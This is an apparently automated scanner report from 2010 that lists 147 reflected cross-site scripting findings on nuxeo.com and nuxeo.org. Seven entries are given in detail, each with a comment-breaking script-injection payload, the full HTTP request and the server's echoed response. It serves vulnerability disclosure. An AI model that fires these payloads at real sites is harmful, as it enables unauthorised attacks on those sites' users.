Report generated by XSS.CX at Mon Nov 15 09:29:35 CST 2010.


Cross Site Scripting Reports | Hoyt LLC Research


1. Cross-site scripting (reflected)

1.1. http://www.nuxeo.com/embedded/yellow-ribbon-en [REST URL parameter 1]

1.2. http://www.nuxeo.com/embedded/yellow-ribbon-en [REST URL parameter 2]

1.3. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 1]

1.4. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 2]

1.5. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 3]

1.6. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 4]

1.7. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 1]

1.8. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 2]

1.9. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 3]

1.10. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 1]

1.11. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 2]

1.12. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 3]

1.13. http://www.nuxeo.com/en/products/document-management/getting-started [REST URL parameter 4]

1.14. http://www.nuxeo.com/en/services/training [REST URL parameter 1]

1.15. http://www.nuxeo.com/en/services/training [REST URL parameter 2]

1.16. http://www.nuxeo.com/en/services/training [REST URL parameter 3]

1.17. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 1]

1.18. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 3]

1.19. http://www.nuxeo.com/extension/nuxeo_design/design/nuxeo/javascript/mtcJSAPI.js [REST URL parameter 5]

1.20. http://www.nuxeo.org/discussions/index.jspa [name of an arbitrarily supplied request parameter]

1.21. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 4]

1.22. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 4]

1.23. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 5]

1.24. http://www.nuxeo.org/xwiki/bin/export/Main/WebHome [REST URL parameter 5]

1.25. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 4]

1.26. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 4]

1.27. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 5]

1.28. http://www.nuxeo.org/xwiki/bin/export/skins/toucan [REST URL parameter 5]

1.29. http://www.nuxeo.org/xwiki/bin/login/XWiki/XWikiLogin [xredirect parameter]

1.30. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 4]

1.31. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 4]

1.32. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 5]

1.33. http://www.nuxeo.org/xwiki/bin/register/XWiki/Register [REST URL parameter 5]

1.34. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 4]

1.35. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 4]

1.36. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 5]

1.37. http://www.nuxeo.org/xwiki/bin/view/FAQ/DownloadingNuxeoSources [REST URL parameter 5]

1.38. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 4]

1.39. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 4]

1.40. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 5]

1.41. http://www.nuxeo.org/xwiki/bin/view/FAQ/LDAPSetup [REST URL parameter 5]

1.42. http://www.nuxeo.org/xwiki/bin/view/Main/ [REST URL parameter 4]

1.43. http://www.nuxeo.org/xwiki/bin/view/Main/ [REST URL parameter 4]

1.44. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 4]

1.45. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 4]

1.46. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 5]

1.47. http://www.nuxeo.org/xwiki/bin/view/Main/Ajax4JSF+Good+practices [REST URL parameter 5]

1.48. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 4]

1.49. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 4]

1.50. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 5]

1.51. http://www.nuxeo.org/xwiki/bin/view/Main/AllDocs [REST URL parameter 5]

1.52. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 4]

1.53. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 4]

1.54. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 5]

1.55. http://www.nuxeo.org/xwiki/bin/view/Main/BlogRss [REST URL parameter 5]

1.56. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 4]

1.57. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 4]

1.58. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 5]

1.59. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 5]

1.60. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 4]

1.61. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 4]

1.62. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 5]

1.63. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 5]

1.64. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 4]

1.65. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 4]

1.66. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 5]

1.67. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 5]

1.68. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 4]

1.69. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 4]

1.70. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 5]

1.71. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 5]

1.72. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 4]

1.73. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 4]

1.74. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 5]

1.75. http://www.nuxeo.org/xwiki/bin/view/Main/Dashboard [REST URL parameter 5]

1.76. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 4]

1.77. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 4]

1.78. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 5]

1.79. http://www.nuxeo.org/xwiki/bin/view/Main/Downloads [REST URL parameter 5]

1.80. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 4]

1.81. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 4]

1.82. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 5]

1.83. http://www.nuxeo.org/xwiki/bin/view/Main/Howto+launch+the+selenium+test+suite [REST URL parameter 5]

1.84. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 4]

1.85. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 4]

1.86. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 5]

1.87. http://www.nuxeo.org/xwiki/bin/view/Main/JCRMigration [REST URL parameter 5]

1.88. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 4]

1.89. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 4]

1.90. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 5]

1.91. http://www.nuxeo.org/xwiki/bin/view/Main/Nuxeo+Testing+Framework [REST URL parameter 5]

1.92. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 4]

1.93. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 4]

1.94. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 5]

1.95. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoDevGettingStarted [REST URL parameter 5]

1.96. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 4]

1.97. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 4]

1.98. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 5]

1.99. http://www.nuxeo.org/xwiki/bin/view/Main/NuxeoProdSetup [REST URL parameter 5]

1.100. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 4]

1.101. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 4]

1.102. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 5]

1.103. http://www.nuxeo.org/xwiki/bin/view/Main/QuickStart53 [REST URL parameter 5]

1.104. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 4]

1.105. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 4]

1.106. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 5]

1.107. http://www.nuxeo.org/xwiki/bin/view/Main/RssFeeds [REST URL parameter 5]

1.108. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 4]

1.109. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 4]

1.110. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 5]

1.111. http://www.nuxeo.org/xwiki/bin/view/Main/Tags [REST URL parameter 5]

1.112. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 4]

1.113. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 4]

1.114. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 5]

1.115. http://www.nuxeo.org/xwiki/bin/view/Main/Understanding+JBoss+Directories [REST URL parameter 5]

1.116. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 4]

1.117. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 4]

1.118. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 5]

1.119. http://www.nuxeo.org/xwiki/bin/view/Main/Using+Nuxeo+API [REST URL parameter 5]

1.120. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 4]

1.121. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 4]

1.122. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 5]

1.123. http://www.nuxeo.org/xwiki/bin/view/Main/WebRss [REST URL parameter 5]

1.124. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 4]

1.125. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 4]

1.126. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 5]

1.127. http://www.nuxeo.org/xwiki/bin/view/Main/WebSearch [REST URL parameter 5]

1.128. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 4]

1.129. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 4]

1.130. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 5]

1.131. http://www.nuxeo.org/xwiki/bin/view/Main/WindowsService [REST URL parameter 5]

1.132. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 4]

1.133. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 4]

1.134. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 5]

1.135. http://www.nuxeo.org/xwiki/bin/view/XWiki/Admin [REST URL parameter 5]

1.136. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 4]

1.137. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 4]

1.138. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 5]

1.139. http://www.nuxeo.org/xwiki/bin/view/XWiki/JaneZupan [REST URL parameter 5]

1.140. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 4]

1.141. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 4]

1.142. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 5]

1.143. http://www.nuxeo.org/xwiki/bin/view/XWiki/LiseKemen [REST URL parameter 5]

1.144. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 4]

1.145. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 4]

1.146. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 5]

1.147. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 5]



1. Cross-site scripting (reflected)
There are 147 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.nuxeo.com/embedded/yellow-ribbon-en [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /embedded/yellow-ribbon-en

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload f0bfc--><script>alert(1)</script>c7ef7c6008c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /embeddedf0bfc--><script>alert(1)</script>c7ef7c6008c/yellow-ribbon-en HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.nuxeo.org/xwiki/bin/view/Main/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:08:47 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Set-Cookie: eZSESSID=b8b8b46a7bc7fb2aa263ffef59cc9a84; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:08:48 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 33709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/embeddedf0bfc--><script>alert(1)</script>c7ef7c6008c/yellow-ribbon-en/-->
...[SNIP]...

1.2. http://www.nuxeo.com/embedded/yellow-ribbon-en [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /embedded/yellow-ribbon-en

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 49edf--><script>alert(1)</script>68af400bc97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /embedded/yellow-ribbon-en49edf--><script>alert(1)</script>68af400bc97 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.nuxeo.org/xwiki/bin/view/Main/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:09:10 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Set-Cookie: eZSESSID=8ce74b880425f816357426d1731ae108; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:09:10 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 33672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/embedded/yellow-ribbon-en49edf--><script>alert(1)</script>68af400bc97/-->
...[SNIP]...

1.3. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/about/events/nuxeoworld2010

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 2d2b4--><script>alert(1)</script>159f19a261e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en2d2b4--><script>alert(1)</script>159f19a261e/about/events/nuxeoworld2010 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:24 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:18:24 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en2d2b4--><script>alert(1)</script>159f19a261e/about/events/nuxeoworld2010/-->
...[SNIP]...

1.4. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/about/events/nuxeoworld2010

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload a5297--><script>alert(1)</script>3cc6fdb1f92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/abouta5297--><script>alert(1)</script>3cc6fdb1f92/events/nuxeoworld2010 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:06 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:06 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/abouta5297--><script>alert(1)</script>3cc6fdb1f92/events/nuxeoworld2010/-->
...[SNIP]...

1.5. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/about/events/nuxeoworld2010

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload f5c36--><script>alert(1)</script>d4ffa27e9fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/about/eventsf5c36--><script>alert(1)</script>d4ffa27e9fd/nuxeoworld2010 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:47 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:47 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/about/eventsf5c36--><script>alert(1)</script>d4ffa27e9fd/nuxeoworld2010/-->
...[SNIP]...

1.6. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/about/events/nuxeoworld2010

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 76a8c--><script>alert(1)</script>892930f1e68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/about/events/nuxeoworld201076a8c--><script>alert(1)</script>892930f1e68 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:20:25 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:20:25 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/about/events/nuxeoworld201076a8c--><script>alert(1)</script>892930f1e68/-->
...[SNIP]...

1.7. http://www.nuxeo.com/en/downloads/download-dm-form [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/downloads/download-dm-form

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 47d33--><script>alert(1)</script>1c4a2e654c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en47d33--><script>alert(1)</script>1c4a2e654c5/downloads/download-dm-form HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:56 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:17:56 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en47d33--><script>alert(1)</script>1c4a2e654c5/downloads/download-dm-form/-->
...[SNIP]...

